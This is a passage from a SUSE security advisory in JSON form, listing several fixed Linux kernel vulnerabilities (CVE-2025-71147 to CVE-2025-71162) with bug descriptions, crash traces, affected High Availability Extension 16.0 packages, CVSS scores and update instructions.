"summary": "CVE-2025-71147",
"url": "https://www.suse.com/security/cve/CVE-2025-71147"
},
{
"category": "external",
"summary": "SUSE Bug 1257158 for CVE-2025-71147",
"url": "https://bugzilla.suse.com/1257158"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71147"
},
{
"cve": "CVE-2025-71148",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71148"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: restore destructor on submit failure\n\nhandshake_req_submit() replaces sk-\u003esk_destruct but never restores it when\nsubmission fails before the request is hashed. handshake_sk_destruct() then\nreturns early and the original destructor never runs, leaking the socket.\nRestore sk_destruct on the error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71148",
"url": "https://www.suse.com/security/cve/CVE-2025-71148"
},
{
"category": "external",
"summary": "SUSE Bug 1257159 for CVE-2025-71148",
"url": "https://bugzilla.suse.com/1257159"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71148"
},
{
"cve": "CVE-2025-71149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/poll: correctly handle io_poll_add() return value on update\n\nWhen the core of io_uring was updated to handle completions\nconsistently and with fixed return codes, the POLL_REMOVE opcode\nwith updates got slightly broken. If a POLL_ADD is pending and\nthen POLL_REMOVE is used to update the events of that request, if that\nupdate causes the POLL_ADD to now trigger, then that completion is lost\nand a CQE is never posted.\n\nAdditionally, ensure that if an update does cause an existing POLL_ADD\nto complete, that the completion value isn\u0027t always overwritten with\n-ECANCELED. For that case, whatever io_poll_add() set the value to\nshould just be retained.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71149",
"url": "https://www.suse.com/security/cve/CVE-2025-71149"
},
{
"category": "external",
"summary": "SUSE Bug 1257164 for CVE-2025-71149",
"url": "https://bugzilla.suse.com/1257164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71149"
},
{
"cve": "CVE-2025-71154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71154"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: rtl8150: fix memory leak on usb_submit_urb() failure\n\nIn async_set_registers(), when usb_submit_urb() fails, the allocated\n async_req structure and URB are not freed, causing a memory leak.\n\n The completion callback async_set_reg_cb() is responsible for freeing\n these allocations, but it is only called after the URB is successfully\n submitted and completes (successfully or with error). If submission\n fails, the callback never runs and the memory is leaked.\n\n Fix this by freeing both the URB and the request structure in the error\n path when usb_submit_urb() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71154",
"url": "https://www.suse.com/security/cve/CVE-2025-71154"
},
{
"category": "external",
"summary": "SUSE Bug 1257163 for CVE-2025-71154",
"url": "https://bugzilla.suse.com/1257163"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71154"
},
{
"cve": "CVE-2025-71156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71156"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngve: defer interrupt enabling until NAPI registration\n\nCurrently, interrupts are automatically enabled immediately upon\nrequest. This allows interrupt to fire before the associated NAPI\ncontext is fully initialized and cause failures like below:\n\n[ 0.946369] Call Trace:\n[ 0.946369] \u003cIRQ\u003e\n[ 0.946369] __napi_poll+0x2a/0x1e0\n[ 0.946369] net_rx_action+0x2f9/0x3f0\n[ 0.946369] handle_softirqs+0xd6/0x2c0\n[ 0.946369] ? handle_edge_irq+0xc1/0x1b0\n[ 0.946369] __irq_exit_rcu+0xc3/0xe0\n[ 0.946369] common_interrupt+0x81/0xa0\n[ 0.946369] \u003c/IRQ\u003e\n[ 0.946369] \u003cTASK\u003e\n[ 0.946369] asm_common_interrupt+0x22/0x40\n[ 0.946369] RIP: 0010:pv_native_safe_halt+0xb/0x10\n\nUse the `IRQF_NO_AUTOEN` flag when requesting interrupts to prevent auto\nenablement and explicitly enable the interrupt in NAPI initialization\npath (and disable it during NAPI teardown).\n\nThis ensures that interrupt lifecycle is strictly coupled with\nreadiness of NAPI context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71156",
"url": "https://www.suse.com/security/cve/CVE-2025-71156"
},
{
"category": "external",
"summary": "SUSE Bug 1257167 for CVE-2025-71156",
"url": "https://bugzilla.suse.com/1257167"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71156"
},
{
"cve": "CVE-2025-71157",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71157"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: always drop device refcount in ib_del_sub_device_and_put()\n\nSince nldev_deldev() (introduced by commit 060c642b2ab8 (\"RDMA/nldev: Add\nsupport to add/delete a sub IB device through netlink\") grabs a reference\nusing ib_device_get_by_index() before calling ib_del_sub_device_and_put(),\nwe need to drop that reference before returning -EOPNOTSUPP error.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71157",
"url": "https://www.suse.com/security/cve/CVE-2025-71157"
},
{
"category": "external",
"summary": "SUSE Bug 1257168 for CVE-2025-71157",
"url": "https://bugzilla.suse.com/1257168"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71157"
},
{
"cve": "CVE-2025-71162",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71162"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: tegra-adma: Fix use-after-free\n\nA use-after-free bug exists in the Tegra ADMA driver when audio streams\nare terminated, particularly during XRUN conditions. The issue occurs\nwhen the DMA buffer is freed by tegra_adma_terminate_all() before the\nvchan completion tasklet finishes accessing it.\n\nThe race condition follows this sequence:\n\n 1. DMA transfer completes, triggering an interrupt that schedules the\n completion tasklet (tasklet has not executed yet)\n 2. Audio playback stops, calling tegra_adma_terminate_all() which\n frees the DMA buffer memory via kfree()\n 3. The scheduled tasklet finally executes, calling vchan_complete()\n which attempts to access the already-freed memory\n\nSince tasklets can execute at any time after being scheduled, there is\nno guarantee that the buffer will remain valid when vchan_complete()\nruns.\n\nFix this by properly synchronizing the virtual channel completion:\n - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the\n descriptors as terminated instead of freeing the descriptor.\n - Add the callback tegra_adma_synchronize() that calls\n vchan_synchronize() which kills any pending tasklets and frees any\n terminated descriptors.\n\nCrash logs:\n[ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0\n[ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0\n\n[ 337.427562] Call trace:\n[ 337.427564] dump_backtrace+0x0/0x320\n[ 337.427571] show_stack+0x20/0x30\n[ 337.427575] dump_stack_lvl+0x68/0x84\n[ 337.427584] print_address_description.constprop.0+0x74/0x2b8\n[ 337.427590] kasan_report+0x1f4/0x210\n[ 337.427598] __asan_load8+0xa0/0xd0\n[ 337.427603] vchan_complete+0x124/0x3b0\n[ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0\n[ 337.427617] tasklet_action+0x30/0x40\n[ 337.427623] __do_softirq+0x1a0/0x5c4\n[ 337.427628] irq_exit+0x110/0x140\n[ 337.427633] handle_domain_irq+0xa4/0xe0\n[ 337.427640] gic_handle_irq+0x64/0x160\n[ 337.427644] call_on_irq_stack+0x20/0x4c\n[ 337.427649] do_interrupt_handler+0x7c/0x90\n[ 337.427654] el1_interrupt+0x30/0x80\n[ 337.427659] el1h_64_irq_handler+0x18/0x30\n[ 337.427663] el1h_64_irq+0x7c/0x80\n[ 337.427667] cpuidle_enter_state+0xe4/0x540\n[ 337.427674] cpuidle_enter+0x54/0x80\n[ 337.427679] do_idle+0x2e0/0x380\n[ 337.427685] cpu_startup_entry+0x2c/0x70\n[ 337.427690] rest_init+0x114/0x130\n[ 337.427695] arch_call_rest_init+0x18/0x24\n[ 337.427702] start_kernel+0x380/0x3b4\n[ 337.427706] __primary_switched+0xc0/0xc8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71162",
"url": "https://www.suse.com/security/cve/CVE-2025-71162"
},
{
"category": "external",
"summary": "SUSE Bug 1257204 for CVE-2025-71162",
"url": "https://bugzilla.suse.com/1257204"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
